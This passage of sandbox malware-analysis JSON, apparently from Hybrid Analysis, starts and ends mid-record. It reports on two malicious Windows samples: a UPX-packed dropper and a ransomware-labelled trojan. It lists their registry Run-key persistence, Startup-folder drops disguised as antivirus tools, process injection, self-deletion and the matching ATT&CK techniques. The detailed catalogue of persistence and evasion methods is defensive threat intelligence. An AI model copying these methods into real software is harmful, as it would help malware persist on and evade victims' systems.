\"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an entrypoint in section \"UPX0\"\n \"085cda53603755dc.exe\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" wrote 55048 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005656]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has section name UPX0 with entropy \"6.00399956096\"\n \"085cda53603755dc.exe\" has section name UPX0 with entropy \"6.00399956096\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca
https://hybrid-analysis.com/sample/585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca
Hybrid Analysis - Ransomware
{"size": 5213184, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca", "sha256": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca", "av_detect": 91, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 3, "total_signatures": 237, "extracted_files": [{"name": "xlsrvintl.dll", "file_path": "%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll", "file_size": 5213184, "sha256": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Filecoder", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "Antivirus.bat", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat", "file_size": 169746, "sha256": "baa3bfb404c663a5a813475773b4b4d479ceb8f1cf02dec627591284b959a343", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with very long lines (844), with CRLF line terminators", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus2.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs", "file_size": 3419, "sha256": "dc98a3995c8c9db2897b3dcd603d0a55e9d6b42cb3900f9b5666dbb461172197", "type_tags": ["text"], "description": "ISO-8859 text, with CRLF line terminators", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus3.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs", "file_size": 10312, "sha256": "556700ac50ffa845e5de853498242ee5abb288eb5b8ae1ae12bfdb5746e3b7b1", "type_tags": ["text"], "description": "C source, ASCII text", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "KasperskyScanner.hta", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta", "file_size": 6995, "sha256": "1a8083787b336b322510f93d930f52aedeb90d2052501e864bfa5b1906e74d58", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMomIsGay.html", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html", "file_size": 5107, "sha256": "390e460334ec801fdeadb511d7404ff2c8b7a0a945a0c763d0b3354e15639dbf", "type_tags": ["html"], "description": "HTML document, ISO-8859 text, with CRLF line terminators", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services", "file_path": "%WINDIR%\\System32\\drivers\\etc\\services", "file_size": 79, "sha256": "8fd9c10a4641311464f5a6529b4d2b23c5727d44cf735b05336d63fb905c9173", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe (PID: 5796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMom.vbs.bin", "file_size": 13584, "sha256": "0d2f271fe7d7a6c9252ebf6e99146991d9ad5bfbb3431d380c00419889d392d6", "type_tags": ["script", "vbs"], "description": "ASCII text", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 268941, "sha256": "c10453217c43fd301e17fb1e2aea932deb8c0632aef81013f2d4acae2d2c8e03", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67AB4E4F.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00000000-00005796", "name": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe", "normalized_path": "C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe", "sha256": "585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca", "av_label": "Trojan.Filecoder", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00002988", "name": "wmplayer.exe", "normalized_path": "%PROGRAMFILES%\\Windows Media Player\\wmplayer.exe", "command_line": "/prefetch:6 /Open \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS32.mp3\"", "sha256": "af2f20f00acdd6e18ef47e2a8f828558d9ae962cdb6f7fd2301876e4e0afd71e"}, {"uid": "00000000-00004824", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 2, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Visual Basic", "attck_id": "T1059.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Rootkit", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", 